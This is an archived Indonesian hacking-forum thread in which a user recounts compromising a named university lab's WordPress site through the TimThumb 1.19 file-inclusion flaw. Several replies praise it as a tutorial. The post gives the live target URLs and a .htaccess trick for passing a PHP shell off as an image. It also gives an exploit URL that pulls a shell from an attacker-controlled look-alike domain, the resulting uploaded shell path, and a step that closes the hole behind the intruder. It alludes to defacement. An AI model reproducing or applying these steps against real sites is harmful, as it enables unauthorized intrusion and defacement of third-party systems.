Devilzc0de Forum Follow @devilzc0de
  • Home
  • Hacking
  • Networking
  • Programming
  • O.S
  • Server
  • Tweets
  • Search
  • Member List
  • Calendar
Current time: 05-22-2013, 05:58 AM Hello There, Guest! (Login — Register)
Devilzc0de Forum › Information Technology › Hacking › Web Attack Report v
1 2 3 4 5 ... 19 Next »

Labkom Universitas Budi luhur Thimthumb Vulnaberity

Home General Computer Multimedia Business Lounge

Pages (3): 1 2 3 Next »
Post Reply 
Tweet
Threaded Mode | Linear Mode
Labkom Universitas Budi luhur Thimthumb Vulnaberity
03-23-2012, 08:43 AM (This post was last modified: 03-24-2012 12:01 AM by ketem.)
Post: #1
ketem Offline
./Devilz Advisor
Posts: 795
Joined: Jun 2011
Reputation: 21
Labkom Universitas Budi luhur Thimthumb Vulnaberity
Intoduction
Sebenernya Ga Mau Publish, Semua Email Adminnya Bouncing jadi publish aja kali yah :)

awalnya sich temen ngomong, cong tembusin aja tuch web budiluhur , kata rektornya kal bisa nembus dapet beasiswa sekolah , langsung otak ketem kelayapan, jadi anak kuliahan , banyak cewe pake rok pendek mimisan

Testing (asal jangan sekali tetes bunting aja >.<")
Pertama Tama Buka dulu webnya
( sebenernya gw udah buka semua web budi luhur cuma belum nemu maklum newbie kelas berat) nah ane tentuin dah tuch targetnya labkom coz banyak yang bilang anak labkom tuch jago jago (studi kasus ane ribut sama wardoyoko xcode mungkin dia udah nembus web ini duluan dan banyak lagi) pertama ane liat dulu source codenya ternyata ada themenya dan itu make wordpress

Code:
http://labkom.budiluhur.ac.id/wp-content/themes/edupress_v1.0.4/edupress/js/jquery.js

terus ane mikir bugs yang paling anget apan yah nah ane coba thimthumb

Code:
http://labkom.budiluhur.ac.id/wp-content/themes/edupress_v1.0.4/edupress//scripts/timthumb.php?src=

menghasilkan

Code:
no image specified
Query String : src=
TimThumb version : 1.19

langsung ane cari shell yang baut thimthumb nanya ke para om sepuh dece dari @[./rex] ,civo ,@[Nanda_23], dll

akhirnyda dapet dari om civo ternyata kurang .htaccsess (ane di kasih tau kang tempe_mendoan

kurang lebhnya code .htaccsess seperti ini

Code:
<FilesMatch "tes.php">
SetHandler image/gif
</FilesMatch>

Code:
file htacsessnya di tarod di server yah htp://blogger.com.blablbala itu
fungsinya kalo ga salah ( yah bener :genit) agar tes.php itu kebacanya gif sama si server tagret ( maaf mohon pencerahan kalo slah :mewek )
akhirnya ane tes

dengan url
Code:
http://labkom.budiluhur.ac.id/wp-content/themes/edupress_v1.0.4/edupress//scripts/timthumb.php?src=http://blogger.com.sertifikasirayon5.com/echo.php

dapet lah hasil

Code:
http://labkom.budiluhur.ac.id/wp-content/themes/edupress_v1.0.4/edupress/scripts/cache/b93b05cf280b5910c3960136fe8a258f.php

nah udah masuk yah abis masuk jangan lupa tutup pintu masuk

pergi ke file thimthumb.php pada line 27 terdapat code

Code:
$ AllowedSites = array ('flickr.com', 'picasa.com', 'blogger.com', 'wordpress.com', 'img.youtube.com', 'upload.wikimedia.org',
'photobucket.com' ,);

ubah menjadi

Code:
$ AllowedSites = array ();

lalu ane coba lagi aksess
Code:
http://labkom.budiluhur.ac.id/wp-content/themes/edupress_v1.0.4/edupress//scripts/timthumb.php?src=http://blogger.com.sertifikasirayon5.com/echo.php

hasilnya

Code:
remote host "blogger.com.sertifikasirayon5.com" not allowed
Query String : src=http://blogger.com.sertifikasirayon5.com/echo.php
TimThumb version : 1.19

[Image: di-M81G.jpg]
akhir kata
Devilzc0de ga pernah nyaranin buat deface web lokal, namun ada beberapa teman yang mungkin kesel ngehubungin adminnya ga ada kontaknya jadi maen pepes aja..kita ga pernah tau saat deface dia lagi gmana (mungkin lagi galau) yang jelas balik lagi Devilzc0de ga pernah nyaranin buat deface web lokal apalagi nyuruh deface web lokal hore
NB : ARtikel Ini hanya buat belajar ts tidak bertanggung jawab dengan apapun akibat artikel ini
Find all posts by this user
Quote this message in a reply
 Reputed by :  poticous(+1) , Reborn Of Code(+1)
03-23-2012, 09:06 AM
Post: #2
aliend Offline
Makhluk Asing
Posts: 720
Joined: Dec 2010
Reputation: 13
RE: Labkom Universitas Budi luhur Thimthumb Vulnaberity
mantap kk
ijin pelajari ia
Find all posts by this user
Quote this message in a reply
03-23-2012, 10:11 AM
Post: #3
hellcomex Offline
./Devilz 1st Cadet
Posts: 8
Joined: Mar 2012
Reputation: 0
RE: Labkom Universitas Budi luhur Thimthumb Vulnaberity
rerem
Find all posts by this user
Quote this message in a reply
03-23-2012, 04:18 PM
Post: #4
sayangidia Offline
./Devilz Officer
Posts: 78
Joined: Jun 2010
Reputation: 0
RE: Labkom Universitas Budi luhur Thimthumb Vulnaberity
mantab dahg tutornya bang ..
enak dibaca dan mudah dipahami ..
Find all posts by this user
Quote this message in a reply
03-23-2012, 04:32 PM
Post: #5
supermenganteng Offline
SPA Holic
********
Jendral Team
Posts: 1,961
Joined: Jun 2010
Reputation: -188
RE: Labkom Universitas Budi luhur Thimthumb Vulnaberity
mantap,,,,nice
Find all posts by this user
Quote this message in a reply
03-23-2012, 04:46 PM
Post: #6
ozilla Offline
./Devilz Officer
Posts: 158
Joined: Aug 2011
Reputation: 0
RE: Labkom Universitas Budi luhur Thimthumb Vulnaberity
super sekali om ketem mantap
Find all posts by this user
Quote this message in a reply
03-23-2012, 06:01 PM
Post: #7
cangcimen Offline
./Devilz Advisor
Posts: 537
Joined: Sep 2010
Reputation: 42
RE: Labkom Universitas Budi luhur Thimthumb Vulnaberity
mantap om
masih blm ngerti nih om..
ijin belajar dulu ketawa
Find all posts by this user
Quote this message in a reply
03-23-2012, 06:17 PM
Post: #8
junker Offline
./Devilz Officer
Posts: 196
Joined: Feb 2012
Reputation: 1
RE: Labkom Universitas Budi luhur Thimthumb Vulnaberity
mantap keren nih belajar
Find all posts by this user
Quote this message in a reply
03-23-2012, 08:10 PM
Post: #9
slumd0g Offline
./Devilz Officer
Posts: 92
Joined: Oct 2011
Reputation: 4
RE: Labkom Universitas Budi luhur Thimthumb Vulnaberity
crootss..mimisan
shellnya dari workshop kmaren, jadi inget kang peti ama kang jos_ali..


btw keren bang mantap
Find all posts by this user
Quote this message in a reply
03-23-2012, 09:06 PM
Post: #10
Eyang Subur Away
cetar memBEHAhaha
****
Posts: 987
Joined: Apr 2010
Reputation: 22
RE: Labkom Universitas Budi luhur Thimthumb Vulnaberity
mantep bray mantap
Visit this user's website Find all posts by this user
Quote this message in a reply
« Next Oldest | Next Newest »
Pages (3): 1 2 3 Next »
Post Reply 


Topic Tools
Topic Link :
BBCode :
HTML Code :
View a Printable Version Send Thread to a Friend Subscribe to this thread
Submit Google Submit Face book Submit to Digg Submit to Reddit Submit to Furl Submit to Del.icio.us Submit to Jeqq

Possibly Related Threads...
Thread: Author Replies: Views: Last Post
  Universitas Indonesia Dan Gunadarma al3x_0wn5 14 550 12-25-2011 11:33 AM
Last Post: eidelweiss

Users Browsing

  • Contact Us
  • devilzc0de
  • Return to Top
  • Mobile Version
  • RSS Syndication
  • Help
Current time: 05-22-2013, 05:58 AM Powered By MyBB, © 2002-2013 MyBB Group. Theme created by Justin S. | Mixed By Chaer.Newbie | Fixed By Aditya

USING THIS SITE INDICATES THAT YOU HAVE READ AND ACCEPT OUR TERMS. IF YOU DO NOT ACCEPT THESE TERMS, YOU ARE NOT AUTHORIZED TO USE THIS SITE